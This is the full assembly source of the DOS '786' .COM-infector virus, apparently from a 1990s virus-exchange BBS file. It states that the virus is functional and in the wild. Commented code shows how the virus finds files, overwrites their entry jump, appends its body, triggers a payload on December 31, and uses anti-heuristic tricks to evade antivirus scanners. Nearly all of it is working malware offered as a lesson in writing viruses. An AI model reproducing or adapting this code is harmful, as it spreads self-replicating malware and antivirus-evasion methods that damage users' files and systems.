;786 v1.01 Virus Source: ;---------------------------------------------------------------------------- ;NOTE: THIS VIRUS IS COMPLETELY FUNCTIONAL AND IS IN THE "WILD". ;PUBLISHED WITH THE CONSENT OF ITS AUTHOR, VIXER. ;Well, this is a simple virus, but that doesn't mean it's not effective. ;This is the original virus source, NOT a disassembly, but we've decided to ;comment it a little more, so as to make things a little easier. ;This is a non-resident virus which infects 1 file in the current directory ;every time an infected file is executed.. It cannot traverse directories, ;therefore its diffusion is a little limited. It is strictly a .COM ;infector, but it does have a few points in its favor.... :-) ;In its heyday, it completely evaded ThunderByte and other A/V products.. ;Anyhow, don't expect to see "THE" virus right off the bat. Knowing how the ;simpler viruses work, it's easier to later understand the more complex ones. ;OK, let's go to the virus, which works as follows: ;---------------------------------------------------------------------------- ; /~~~\ ;/ÄÄÄÄÄ\ ;³ ³ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ;³ ³³ ViRuS 786 v1.01 --> by û­Xäâ ÚÙ ;³ ô~~~~~~~^^^~~~~~~~~~~~~~~~^^^^^~ ÚÙ ;³ ³³ ÚÙ ;³ ôCharacteristics: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-ÚÙ ;³ ³³ -Non resident ÚÙ ;³ ô -Appending ÚÙ ;³ ³³ -Will not re-infect files ÚÙ ;³ ô ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ;³ ³³ -Infects at end-of-file À¿ ;³ ô -Displays a message on December 31 of any year À¿ ;³ ³³ -Virulence: 1 infection per execution À¿ ;³ ô -Searches for files in the current path-=-=-=-=-=-=-=-=-À¿ ;³ ³³ -Anti Heuristic techniques À¿ ;³ ô ^(Neither F-Prot nor TBAV detect it in "HIGH" mode À¿ ;³ ³³ À¿ ;³ ³³ /* Created on 1 June 1994 */ À¿ ;³ ³ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ;³ ³ ;³ ³ ;³ ³ ;³ ³ .286c Codigo Segment 'code' org 100h Assume cs:Codigo, ds:Codigo, es:Codigo Start Proc Far jmp Comienzo ;JMP 3 bytes to the virus db "V" ;infection identifier nop nop ;Host program mov ax, 04c00h int 21h ;AQUI COMIENZA EL VIRUS EN SI---------------------------------------------- Comienzo: ;Virus starts here push cs push cs pop ds pop es call Proc_falso ;Calls Proc_falso so that IP Proc_falso proc near ;register is in the stack Proc_falso endp mov di, sp ;equivalent to POP BP mov bp, word ptr ss:[di] ;SUB BP, OFFSET PROC_FALSO sub bp, offset Proc_falso ;Anti heuristic technique add sp, 02d ;Upon execution, the virus obtains its position by calculating offset á. ;Once the virus knows where it is, it references its own variables relative ;to BP... ;---------------------------------------------------------------------------- mov cx, 43d ;Saves original DTA lea di, bp + DTA_orig mov si, 0080h rep movsb ;The virus saves the original DTA because when looking for a file to infect ;with function 4eh (find first entry) or 4fh (find next entry), the contents ;of the original DTA are destroyed; it gets filled with the information ;related to the file found by means of these functions. This data is used ;by the Host program, and if overwritten, it may do all kinds of odd stuff, ;but usually exits to DOS with an error. ;---------------------------------------------------------------------------- jmp Check_PlayLoad ;Of course it doesn't execute the data ;------------------------------------------------------------- DTA_orig db 43d dup (0) ;Space for the DTA Jump db 0e9h ;JUMP Firma db "V" ;Virus "signature" Longitud db 2 dup (0) Bytes_Orig db 090h, 090h, 090h, 090h ;Original bytes of the infected ;program. File_busc db "*.C?M", 0 ;Searches for *.C?M, not *.COM - another anti-heuristic ;technique. Mensaje db 0ah,0dh db "Este es el virus 786 Version 1 ", 0ah, 0dh ;Message db "Echo por --> û­xäâ [ûxâ]/A.H.D. HALKA/. Industria Argentina", 0ah, 0dh db "Quemen al mu¤eco del `94!", 0ah, 0dh db "$ OHH NO, ME HA DESCUBIERTO!!!", 0ah, 0dh ;String ;TRANSLATION: ;"This is the 786 virus, Version 1" ;"Made by --> û­xäâ [ûxâ]/A.H.D. HALKA/. Argentine Industry" ; (If I remember correctly, HALKA is some kind of hair grease... A.) ;"Burn the effigy of '94" ; (No real translation for "mu¤eco" as intended in the message. ; ("Puppet" may be a better approximation; it's an minor insult.) ;"OHH NO, I'VE BEEN DISCOVERED" ;---------------------------------------------------------------------------- Check_PlayLoad: mov ah, 02ah ;See if it's December int 021h cmp dh, 12d jne No_Playload cmp dl, 31 ;See if it's the 31st jne No_Playload ;Here it verifies that the file execution is December by using INT 21 ;service 2ah to ask for the system date. This service returns the current ;month in DH and I compare it to month '12' (December). It it's the correct ;month, I check to see if it's the 31st by comparing DL with 31 (DL contains ;the current day). If it's the desired date, the virus is triggered and ;delivers it's payload (the virus "detonates"). Since the 786 virus is a ;"benevolent" virus, it will only display a message and the infected file ;will cease execution, exiting to DOS. If it's NOT the desired date, it ;JUMPs to NO_PAYLOAD where it looks for another file to infect. ;---------------------------------------------------------------------------- mov ax, 0900h ;It's December 31, display message! lea dx, bp + Mensaje int 021h mov ax, 04c00h ;Don't execute infected host. int 021h No_Playload: cld ;Restore the first 4 bytes of the mov cx, 4d ;infected program. mov di, 0100h lea si, bp + Bytes_Orig rep movsb ;This code restores the first bytes of the host program, which were over- ;written with a JUMP instruction to the body of the virus (so that the virus ;gained control FIRST). The JUMP instruction has the following format: ;'éXX' where the 'é' the jump ASCII and the 'XX' the address of the jump (the ;location of the virus). ;All of this is fine and dandy, but when it's time to return control to the ;host we find it would have been a good idea to save those bytes BEFORE they ;were overwritten, huh? So that's what we do: we restore the bytes so the ;host can executed and jump to offset 100h (from where the executable code of ;ALL COMs is loaded. ;---------------------------------------------------------------------------- Buscar_File: mov ax, 04e00h ;Find first file in directory mov cx, 0 lea dx, File_busc + bp int 021h jnb Hay_files ;Jump if *.C?M found ;I search for the first file in the directory. If a COM is found, jump to ;HAY_FILES and check for infection. If no COM files, I return control to ;the COM without infecting and that's all. (Too bad) :( ;) ;---------------------------------------------------------------------------- Retornar: ;No *.C?M ? mov cx, 43d ;Restore original DTA lea si, bp + DTA_orig mov di, 0080h rep movsb push 0100h ;Execute infected program pop ax ;Same as JMP 0100h jmp ax ;Another anti-heuristic technique ;Here's what I was telling you about the DTA. Before executing the host I ;leave it as it was BEFORE searching for COMs and presto! Now we jump to ;offset 100h, and it's done.... the host has control. ;) ;---------------------------------------------------------------------------- Hay_files: mov ax, 03d02h mov dx, 0009eh ;Found a file; now open it. int 021h push ax pop bx push bx mov ax, 03f00h ;Read the first 4 bytes mov cx, 0004h lea dx, Bytes_Orig + bp ;and store in Bytes_Orig int 021h mov cl, byte ptr cs:[bytes_orig + bp+3] ;Verify infection cmp cl, Firma + bp jne Infectar ;This code checks the file for a previous infection. We open the file and ;compare the fourth byte to 'û' and there is a match the file is infected. ;There is a minor drawback to this since it is always possible that the file ;may have a 'û' as its fourth byte, in which case the virus would be "fooled" ;into leaving the file uninfected. ;If there is no match, the virus infects the file (JUMP to INFECTAR). ;If there is a match, there was a previous infection and the virus closes the ;file and searches for a new one to infect.... ;---------------------------------------------------------------------------- Proximo_File: pop bx ;Already infected, find another mov ah, 03eh int 021h ;Close previous file mov ah, 04fh int 021h jb Retornar ;if this jump is executed there are ;no more files in the directory. jmp Hay_files ;Searches for another file. If the JB (jump below) executes, there were no ;more COMs in the directory and it stops searching. If it finds another file ;it checks for infection.. (JMP HAY_FILES) ;---------------------------------------------------------------------------- Infectar: ;Infect the file! pop bx push bx mov ax, 04200h ;Move read/write pointer (LSEEK) to ;the beginning of the program. mov cx, 0 mov dx, 0 int 021h pop bx ;Write the JMP to the virus push bx mov ah, 040h mov cx, 1 lea dx, Jump + bp int 021h mov cx, 2 ;Calculate the JMP to the virus mov si, 009ah ;(program length + 1) lea di, bp + Longitud rep movsb add Longitud + bp,1 pop bx ;Store the result of the previous push bx ;calculation mov ah, 040h mov cx, 2 lea dx, Longitud + bp int 021h pop bx ;Write the infection "signature" push bx mov ah, 040h mov cx, 1 lea dx, bp + Firma int 021h pop bx push bx mov ax, 04202h ;Move read/write pointer (LSEEK) to ;end of program mov cx, 0 mov dx, 0 int 021h mov cx, 43d ;Restore original DTA lea si, bp + DTA_orig mov di, 0080h rep movsb mov cx,43d ;erase the variable DTA_orig lea bx, DTA_orig + bp ;We do this to avoid false alarms DTA_clr: ;with the anti-virus heuristics mov byte ptr [bx],0 inc bx loop DTA_clr pop bx ;Write the virus to the file push bx mov ah, 040h mov cx, 1000d ;the virus measures 512d bytes but lea dx, bp + Comienzo ;it adds 1000d because that's less int 021h ;noticeable. pop bx ;The program is infected! mov ah, 03eh ;Now close it. int 021h push 0100h ;Execute host. pop ax ;Same as JMP 0100h jmp ax ;Another anti-heuristic technique start endp codigo ends end start ;---> Este û­âu$ NO es Number_of_the_beast! <--- ;---> (This virus is not # of the beast) ;ACLR: TBAV and F-PROT cannot detect it with heuristic search, but it CAN be ; found with search strings. ;ACLR2:If you are interested in the original source, it can be found on any ; of the BBSs listed here... ;---------------------------------------------------------------------------- ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Remember Where You Saw This Phile First ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄ[=] ARRESTED DEVELOPMENT +31.77.547477 The Netherlands [=]ÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ